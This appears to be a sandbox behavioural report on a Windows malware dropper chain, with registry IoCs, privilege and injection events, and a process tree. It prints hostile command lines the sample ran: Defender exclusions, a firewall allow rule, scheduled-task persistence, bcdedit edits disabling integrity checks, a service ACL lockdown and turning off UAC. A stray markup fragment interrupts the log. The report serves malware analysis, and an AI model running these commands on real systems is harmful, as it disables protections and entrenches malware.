Set value (str) | <MuiCache>\C:\Windows\system32\,@tzres.dll,-242 = "Samoa Standard Time" | xO4GOimcBGQkXzhbomVS7wqE.exe
Set value (str) | <MuiCache>\@tzres.dll,-472 = "Ekaterinburg Standard Time" | windefender.exe
Set value (str) | <MuiCache>\@tzres.dll,-731 = "Fiji Daylight Time" | windefender.exe
Set value (str) | <MuiCache>\@tzres.dll,-82 = "Atlantic Standard Time" | windefender.exe
Set value (str) | <MuiCache>\@tzres.dll,-301 = "Romance Daylight Time" | windefender.exe
Set value (str) | <MuiCache>\@tzres.dll,-1042 = "Ulaanbaatar Standard Time" | windefender.exe
Set value (str) | <MuiCache>\C:\Windows\system32\,@tzres.dll,-582 = "North Asia East Standard Time" | xO4GOimcBGQkXzhbomVS7wqE.exe
Set value (str) | <MuiCache>\C:\Windows\system32\,@tzres.dll,-192 = "Mountain Standard Time" | xO4GOimcBGQkXzhbomVS7wqE.exe
Set value (str) | <MuiCache>\C:\Windows\system32\,@tzres.dll,-1411 = "Syria Daylight Time" | xO4GOimcBGQkXzhbomVS7wqE.exe
Set value (str) | <MuiCache>\@%SystemRoot%\system32\tsgqec.dll,-102 = "1.0" | netsh.exe
Set value (str) | <MuiCache>\C:\Windows\system32\,@tzres.dll,-872 = "Pakistan Standard Time" | xO4GOimcBGQkXzhbomVS7wqE.exe
Set value (str) | <MuiCache>\C:\Windows\system32\,@tzres.dll,-792 = "SA Western Standard Time" | xO4GOimcBGQkXzhbomVS7wqE.exe
Set value (str) | <MuiCache>\@%SystemRoot%\system32\tsgqec.dll,-101 = "Provides RD Gateway enforcement for NAP" | netsh.exe
Set value (str) | <MuiCache>\@%SystemRoot%\system32\eapqec.dll,-102 = "1.0" | netsh.exe
Set value (str) | <MuiCache>\@tzres.dll,-532 = "Sri Lanka Standard Time" | windefender.exe
Set value (str) | <MuiCache>\C:\Windows\system32\,@tzres.dll,-912 = "Mauritius Standard Time" | xO4GOimcBGQkXzhbomVS7wqE.exe
Set value (str) | <MuiCache>\C:\Windows\system32\,@tzres.dll,-364 = "Middle East Daylight Time" | xO4GOimcBGQkXzhbomVS7wqE.exe
Set value (str) | <MuiCache>\C:\Windows\system32\,@tzres.dll,-171 = "Central Daylight Time (Mexico)" | xO4GOimcBGQkXzhbomVS7wqE.exe
Set value (str) | <MuiCache>\@tzres.dll,-448 = "Azerbaijan Daylight Time" | windefender.exe
Set value (str) | <MuiCache>\C:\Windows\system32\,@tzres.dll,-292 = "Central European Standard Time" | xO4GOimcBGQkXzhbomVS7wqE.exe
Set value (str) | <MuiCache>\@tzres.dll,-449 = "Azerbaijan Standard Time" | windefender.exe
Set value (str) | <MuiCache>\@tzres.dll,-891 = "Morocco Daylight Time" | windefender.exe
Set value (str) | <MuiCache>\C:\Windows\system32\,@tzres.dll,-662 = "Cen. Australia Standard Time" | xO4GOimcBGQkXzhbomVS7wqE.exe
Set value (str) | <MuiCache>\C:\Windows\system32\,@tzres.dll,-492 = "India Standard Time" | xO4GOimcBGQkXzhbomVS7wqE.exe
Set value (str) | <MuiCache>\@tzres.dll,-332 = "E. Europe Standard Time" | windefender.exe
Set value (str) | <MuiCache>\C:\Windows\system32\,@tzres.dll,-42 = "E. South America Standard Time" | xO4GOimcBGQkXzhbomVS7wqE.exe
Set value (str) | <MuiCache>\@tzres.dll,-141 = "Canada Central Daylight Time" | windefender.exe
Set value (str) | <MuiCache>\@tzres.dll,-381 = "South Africa Daylight Time" | windefender.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | wscript.exe
Set value (str) | <MuiCache>\C:\Windows\system32\,@tzres.dll,-82 = "Atlantic Standard Time" | xO4GOimcBGQkXzhbomVS7wqE.exe
Set value (data) | <MuiCache>\LanguageList = 65006e002d0055005300000065006e0000000000 | uxf8mXBfEKTRBQXR1KuWCnLl.exe
Set value (str) | <MuiCache>\@tzres.dll,-841 = "Argentina Daylight Time" | windefender.exe
Set value (str) | <MuiCache>\@tzres.dll,-541 = "Myanmar Daylight Time" | windefender.exe
Set value (str) | <MuiCache>\C:\Windows\system32\,@tzres.dll,-722 = "Central Pacific Standard Time" | xO4GOimcBGQkXzhbomVS7wqE.exe
Set value (str) | <MuiCache>\C:\Windows\system32\,@tzres.dll,-692 = "Tasmania Standard Time" | xO4GOimcBGQkXzhbomVS7wqE.exe
Set value (str) | <MuiCache>\@%SystemRoot%\system32\napipsec.dll,-4 = "1.0" | netsh.exe
Set value (str) | <MuiCache>\@%SystemRoot%\system32\tsgqec.dll,-100 = "RD Gateway Quarantine Enforcement Client" | netsh.exe
Set value (str) | <MuiCache>\@tzres.dll,-412 = "E. Africa Standard Time" | windefender.exe
Set value (str) | <MuiCache>\C:\Windows\system32\,@tzres.dll,-512 = "Central Asia Standard Time" | xO4GOimcBGQkXzhbomVS7wqE.exe
Set value (str) | <MuiCache>\@tzres.dll,-21 = "Cape Verde Daylight Time" | windefender.exe
Set value (str) | <MuiCache>\C:\Windows\system32\,@tzres.dll,-652 = "AUS Central Standard Time" | xO4GOimcBGQkXzhbomVS7wqE.exe
Set value (str) | <MuiCache>\C:\Windows\system32\,@tzres.dll,-891 = "Morocco Daylight Time" | xO4GOimcBGQkXzhbomVS7wqE.exe
Set value (str) | <MuiCache>\@tzres.dll,-384 = "Namibia Daylight Time" | windefender.exe
Set value (str) | <MuiCache>\@%SystemRoot%\system32\napipsec.dll,-3 = "Microsoft Corporation" | netsh.exe
Set value (str) | <MuiCache>\@tzres.dll,-362 = "GTB Standard Time" | windefender.exe
Key created | \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace\Session | netsh.exe
Set value (str) | <MuiCache>\@tzres.dll,-172 = "Central Standard Time (Mexico)" | windefender.exe
Set value (str) | <MuiCache>\@tzres.dll,-471 = "Ekaterinburg Daylight Time" | windefender.exe
Set value (str) | <MuiCache>\@tzres.dll,-51 = "Greenland Daylight Time" | windefender.exe
Set value (str) | <MuiCache>\C:\Windows\system32\,@tzres.dll,-371 = "Jerusalem Daylight Time" | xO4GOimcBGQkXzhbomVS7wqE.exe
Set value (str) | <MuiCache>\C:\Windows\system32\,@tzres.dll,-542 = "Myanmar Standard Time" | xO4GOimcBGQkXzhbomVS7wqE.exe
Set value (str) | <MuiCache>\C:\Windows\system32\,@tzres.dll,-1042 = "Ulaanbaatar Standard Time" | xO4GOimcBGQkXzhbomVS7wqE.exe
Set value (data) | <MuiCache>\LanguageList = 65006e002d0055005300000065006e0000000000 | netsh.exe
Set value (str) | <MuiCache>\@tzres.dll,-104 = "Central Brazilian Daylight Time" | windefender.exe
Set value (str) | <MuiCache>\C:\Windows\system32\,@tzres.dll,-501 = "Nepal Daylight Time" | xO4GOimcBGQkXzhbomVS7wqE.exe
Set value (str) | <MuiCache>\C:\Windows\system32\,@tzres.dll,-211 = "Pacific Daylight Time" | xO4GOimcBGQkXzhbomVS7wqE.exe
Set value (str) | <MuiCache>\@tzres.dll,-261 = "GMT Daylight Time" | windefender.exe
Set value (str) | <MuiCache>\@tzres.dll,-182 = "Mountain Standard Time (Mexico)" | windefender.exe
Set value (str) | <MuiCache>\C:\Windows\system32\,@tzres.dll,-352 = "FLE Standard Time" | xO4GOimcBGQkXzhbomVS7wqE.exe
Set value (str) | <MuiCache>\C:\Windows\system32\,@tzres.dll,-741 = "New Zealand Daylight Time" | xO4GOimcBGQkXzhbomVS7wqE.exe
Set value (str) | <MuiCache>\C:\Windows\system32\,@tzres.dll,-931 = "Coordinated Universal Time" | xO4GOimcBGQkXzhbomVS7wqE.exe
Set value (str) | <MuiCache>\@tzres.dll,-752 = "Tonga Standard Time" | windefender.exe
</gr_repl…

The MuiCache time-zone strings are a side effect of the dropped binaries resolving localized resource strings while running as SYSTEM (hence .DEFAULT); the rows that carry signal are the ZoneMap key created by wscript.exe and the NetTrace session from netsh.exe. The two LanguageList blobs decode (UTF-16LE) to "en-US", "en".
description | ioc | Process
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = (blob omitted) | file.exe
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = (blob omitted) | patch.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474 | patch.exe
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = (blob omitted) | file.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 | patch.exe
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = (blob omitted) | patch.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 | csrss.exe
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = (hex blob follows; the source is cut off inside it, and the DER it contains names the issuer/subject "Digital Signature Trust Co." / "DST Root CA X3")
file.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 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 csrss.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 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 patch.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 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 patch.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 file.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 
file.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 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 patch.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 file.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2760 file.exe 2760 file.exe 312 powershell.exe 1536 uxf8mXBfEKTRBQXR1KuWCnLl.exe 1920 xO4GOimcBGQkXzhbomVS7wqE.exe 2136 nso8C0C.tmp 1156 xO4GOimcBGQkXzhbomVS7wqE.exe 1156 xO4GOimcBGQkXzhbomVS7wqE.exe 1156 xO4GOimcBGQkXzhbomVS7wqE.exe 1156 xO4GOimcBGQkXzhbomVS7wqE.exe 1156 xO4GOimcBGQkXzhbomVS7wqE.exe 2848 uxf8mXBfEKTRBQXR1KuWCnLl.exe 2848 uxf8mXBfEKTRBQXR1KuWCnLl.exe 2848 uxf8mXBfEKTRBQXR1KuWCnLl.exe 2848 uxf8mXBfEKTRBQXR1KuWCnLl.exe 2848 uxf8mXBfEKTRBQXR1KuWCnLl.exe 2944 injector.exe 2944 injector.exe 2944 injector.exe 2944 injector.exe 2944 injector.exe 2944 injector.exe 2944 injector.exe 2944 injector.exe 2944 injector.exe 2944 injector.exe 2944 injector.exe 2944 injector.exe 2944 injector.exe 2944 injector.exe 2944 injector.exe 2944 injector.exe 1736 powershell.EXE 2944 injector.exe 2944 injector.exe 1736 powershell.EXE 1736 powershell.EXE 2944 injector.exe 2944 injector.exe 2944 injector.exe 2944 injector.exe 2944 injector.exe 2944 injector.exe 2944 injector.exe 2944 injector.exe 2944 injector.exe 2944 injector.exe 2944 injector.exe 2944 injector.exe 2944 injector.exe 2944 injector.exe 2944 injector.exe 2944 injector.exe 2944 injector.exe 2944 injector.exe 2944 injector.exe 2944 injector.exe 2944 injector.exe 2944 injector.exe 2944 injector.exe 2944 injector.exe 2944 injector.exe 2944 injector.exe 2944 injector.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 468 Process not Found -
Suspicious use of AdjustPrivilegeToken 13 IoCs
description pid Process Token: SeDebugPrivilege 2760 file.exe Token: SeDebugPrivilege 752 AddInProcess32.exe Token: SeDebugPrivilege 312 powershell.exe Token: SeDebugPrivilege 1536 uxf8mXBfEKTRBQXR1KuWCnLl.exe Token: SeImpersonatePrivilege 1536 uxf8mXBfEKTRBQXR1KuWCnLl.exe Token: SeDebugPrivilege 1920 xO4GOimcBGQkXzhbomVS7wqE.exe Token: SeImpersonatePrivilege 1920 xO4GOimcBGQkXzhbomVS7wqE.exe Token: SeSystemEnvironmentPrivilege 2052 csrss.exe Token: SeDebugPrivilege 1736 powershell.EXE Token: SeSecurityPrivilege 1556 sc.exe Token: SeSecurityPrivilege 1556 sc.exe Token: SeDebugPrivilege 1696 powershell.EXE Token: SeDebugPrivilege 2100 powershell.EXE -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2476 BroomSetup.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2760 wrote to memory of 312 2760 file.exe 28 PID 2760 wrote to memory of 312 2760 file.exe 28 PID 2760 wrote to memory of 312 2760 file.exe 28 PID 2760 wrote to memory of 312 2760 file.exe 28 PID 2760 wrote to memory of 656 2760 file.exe 30 PID 2760 wrote to memory of 656 2760 file.exe 30 PID 2760 wrote to memory of 656 2760 file.exe 30 PID 2760 wrote to memory of 656 2760 file.exe 30 PID 2760 wrote to memory of 752 2760 file.exe 31 PID 2760 wrote to memory of 752 2760 file.exe 31 PID 2760 wrote to memory of 752 2760 file.exe 31 PID 2760 wrote to memory of 752 2760 file.exe 31 PID 2760 wrote to memory of 752 2760 file.exe 31 PID 2760 wrote to memory of 752 2760 file.exe 31 PID 2760 wrote to memory of 752 2760 file.exe 31 PID 2760 wrote to memory of 752 2760 file.exe 31 PID 2760 wrote to memory of 752 2760 file.exe 31 PID 752 wrote to memory of 2044 752 AddInProcess32.exe 32 PID 752 wrote to memory of 2044 752 AddInProcess32.exe 32 PID 752 wrote to memory of 2044 752 AddInProcess32.exe 32 PID 752 wrote to memory of 2044 752 AddInProcess32.exe 32 PID 752 wrote to memory of 1536 752 AddInProcess32.exe 33 PID 752 wrote to memory of 1536 752 AddInProcess32.exe 33 PID 752 wrote to memory of 1536 752 AddInProcess32.exe 33 PID 752 wrote to memory of 1536 752 AddInProcess32.exe 33 PID 752 wrote to memory of 1920 752 AddInProcess32.exe 34 PID 752 wrote to memory of 1920 752 AddInProcess32.exe 34 PID 752 wrote to memory of 1920 752 AddInProcess32.exe 34 PID 752 wrote to memory of 1920 752 AddInProcess32.exe 34 PID 2044 wrote to memory of 2476 2044 qf2qmDJ9ve1MH2AQC1wZpqmY.exe 35 PID 2044 wrote to memory of 2476 2044 qf2qmDJ9ve1MH2AQC1wZpqmY.exe 35 PID 2044 wrote to memory of 2476 2044 qf2qmDJ9ve1MH2AQC1wZpqmY.exe 35 PID 2044 wrote to memory of 2476 2044 qf2qmDJ9ve1MH2AQC1wZpqmY.exe 35 PID 2044 wrote to memory of 2476 2044 qf2qmDJ9ve1MH2AQC1wZpqmY.exe 35 PID 2044 wrote to memory of 2476 2044 qf2qmDJ9ve1MH2AQC1wZpqmY.exe 35 PID 2044 
wrote to memory of 2476 2044 qf2qmDJ9ve1MH2AQC1wZpqmY.exe 35 PID 752 wrote to memory of 2512 752 AddInProcess32.exe 37 PID 752 wrote to memory of 2512 752 AddInProcess32.exe 37 PID 752 wrote to memory of 2512 752 AddInProcess32.exe 37 PID 752 wrote to memory of 2512 752 AddInProcess32.exe 37 PID 2044 wrote to memory of 2136 2044 qf2qmDJ9ve1MH2AQC1wZpqmY.exe 43 PID 2044 wrote to memory of 2136 2044 qf2qmDJ9ve1MH2AQC1wZpqmY.exe 43 PID 2044 wrote to memory of 2136 2044 qf2qmDJ9ve1MH2AQC1wZpqmY.exe 43 PID 2044 wrote to memory of 2136 2044 qf2qmDJ9ve1MH2AQC1wZpqmY.exe 43 PID 752 wrote to memory of 1752 752 AddInProcess32.exe 46 PID 752 wrote to memory of 1752 752 AddInProcess32.exe 46 PID 752 wrote to memory of 1752 752 AddInProcess32.exe 46 PID 752 wrote to memory of 1752 752 AddInProcess32.exe 46 PID 1156 wrote to memory of 1760 1156 xO4GOimcBGQkXzhbomVS7wqE.exe 47 PID 1156 wrote to memory of 1760 1156 xO4GOimcBGQkXzhbomVS7wqE.exe 47 PID 1156 wrote to memory of 1760 1156 xO4GOimcBGQkXzhbomVS7wqE.exe 47 PID 1156 wrote to memory of 1760 1156 xO4GOimcBGQkXzhbomVS7wqE.exe 47 PID 2848 wrote to memory of 2356 2848 uxf8mXBfEKTRBQXR1KuWCnLl.exe 52 PID 2848 wrote to memory of 2356 2848 uxf8mXBfEKTRBQXR1KuWCnLl.exe 52 PID 2848 wrote to memory of 2356 2848 uxf8mXBfEKTRBQXR1KuWCnLl.exe 52 PID 2848 wrote to memory of 2356 2848 uxf8mXBfEKTRBQXR1KuWCnLl.exe 52 PID 1760 wrote to memory of 2768 1760 cmd.exe 49 PID 1760 wrote to memory of 2768 1760 cmd.exe 49 PID 1760 wrote to memory of 2768 1760 cmd.exe 49 PID 2356 wrote to memory of 3024 2356 cmd.exe 51 PID 2356 wrote to memory of 3024 2356 cmd.exe 51 PID 2356 wrote to memory of 3024 2356 cmd.exe 51 PID 2476 wrote to memory of 512 2476 BroomSetup.exe 54 PID 2476 wrote to memory of 512 2476 BroomSetup.exe 54 -
System policy modification 1 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" file.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- UAC bypass
- Windows security bypass
- Windows security modification
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2760 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\file.exe" -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:312
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"2⤵PID:656
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"2⤵
- Drops startup file
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:752 -
C:\Users\Admin\Pictures\qf2qmDJ9ve1MH2AQC1wZpqmY.exe"C:\Users\Admin\Pictures\qf2qmDJ9ve1MH2AQC1wZpqmY.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2044 -
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exeC:\Users\Admin\AppData\Local\Temp\BroomSetup.exe4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2476 -
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "5⤵PID:512
-
C:\Windows\SysWOW64\chcp.comchcp 12516⤵PID:1208
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F6⤵
- Creates scheduled task(s)
PID:1192
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\nso8C0C.tmpC:\Users\Admin\AppData\Local\Temp\nso8C0C.tmp4⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:2136 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\nso8C0C.tmp" & del "C:\ProgramData\*.dll"" & exit5⤵PID:3040
-
C:\Windows\SysWOW64\timeout.exetimeout /t 56⤵
- Delays execution with timeout.exe
PID:2024
-
-
-
-
-
C:\Users\Admin\Pictures\uxf8mXBfEKTRBQXR1KuWCnLl.exe"C:\Users\Admin\Pictures\uxf8mXBfEKTRBQXR1KuWCnLl.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1536 -
C:\Users\Admin\Pictures\uxf8mXBfEKTRBQXR1KuWCnLl.exe"C:\Users\Admin\Pictures\uxf8mXBfEKTRBQXR1KuWCnLl.exe"4⤵
- Windows security bypass
- Executes dropped EXE
- Loads dropped DLL
- Windows security modification
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2848 -
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"5⤵
- Suspicious use of WriteProcessMemory
PID:2356
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe5⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Manipulates WinMon driver.
- Manipulates WinMonFS driver.
- Drops file in Windows directory
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:2052 -
C:\Windows\system32\schtasks.exeschtasks /delete /tn ScheduledUpdate /f6⤵PID:2908
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
PID:2756 -
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}7⤵
- Modifies boot configuration data using bcdedit
PID:1980
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -timeout 07⤵
- Modifies boot configuration data using bcdedit
PID:868
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast7⤵
- Modifies boot configuration data using bcdedit
PID:2900
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}7⤵
- Modifies boot configuration data using bcdedit
PID:656
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 17⤵
- Modifies boot configuration data using bcdedit
PID:1916
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn7⤵
- Modifies boot configuration data using bcdedit
PID:2108
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 07⤵
- Modifies boot configuration data using bcdedit
PID:2980
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe7⤵
- Modifies boot configuration data using bcdedit
PID:2072
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe7⤵
- Modifies boot configuration data using bcdedit
PID:1480
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows7⤵
- Modifies boot configuration data using bcdedit
PID:2620
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:7⤵
- Modifies boot configuration data using bcdedit
PID:1952
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:7⤵
- Modifies boot configuration data using bcdedit
PID:1960
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER7⤵
- Modifies boot configuration data using bcdedit
PID:2516
-
-
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F6⤵
- Creates scheduled task(s)
PID:1368
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeC:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2944
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exeC:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe6⤵
- Executes dropped EXE
PID:2856
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\Sysnative\bcdedit.exe /v6⤵
- Modifies boot configuration data using bcdedit
PID:1236
-
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F6⤵
- Creates scheduled task(s)
PID:3020
-
-
C:\Windows\windefender.exe"C:\Windows\windefender.exe"6⤵
- Executes dropped EXE
PID:2308 -
C:\Windows\SysWOW64\cmd.execmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)7⤵PID:2056
-
C:\Windows\SysWOW64\sc.exesc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)8⤵
- Launches sc.exe
- Suspicious use of AdjustPrivilegeToken
PID:1556
-
-
-
-
-
-
-
C:\Users\Admin\Pictures\xO4GOimcBGQkXzhbomVS7wqE.exe"C:\Users\Admin\Pictures\xO4GOimcBGQkXzhbomVS7wqE.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1920 -
C:\Users\Admin\Pictures\xO4GOimcBGQkXzhbomVS7wqE.exe"C:\Users\Admin\Pictures\xO4GOimcBGQkXzhbomVS7wqE.exe"4⤵
- Windows security bypass
- Executes dropped EXE
- Windows security modification
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1156 -
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"5⤵
- Suspicious use of WriteProcessMemory
PID:1760 -
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes6⤵
- Modifies Windows Firewall
- Modifies data under HKEY_USERS
PID:2768
-
-
-
-
-
C:\Users\Admin\Pictures\uSAXN67jO1NV6A1Dms0TQwUe.exe"C:\Users\Admin\Pictures\uSAXN67jO1NV6A1Dms0TQwUe.exe"3⤵
- Executes dropped EXE
PID:2512
-
-
C:\Users\Admin\Pictures\4Obr3e4WwXT6zfKFALzQ6SNr.exe"C:\Users\Admin\Pictures\4Obr3e4WwXT6zfKFALzQ6SNr.exe" PeJj3z5KgQO+REOMHfxRWZMfrERTkhHmRUWETPcQX9Iwim5oqDrINyf9NcQnEA==3⤵
- Executes dropped EXE
PID:1752
-
-
C:\Users\Admin\Pictures\HWoskNzoWXP58nKa90DwL1zh.exe"C:\Users\Admin\Pictures\HWoskNzoWXP58nKa90DwL1zh.exe" --silent --allusers=03⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2088
-
-
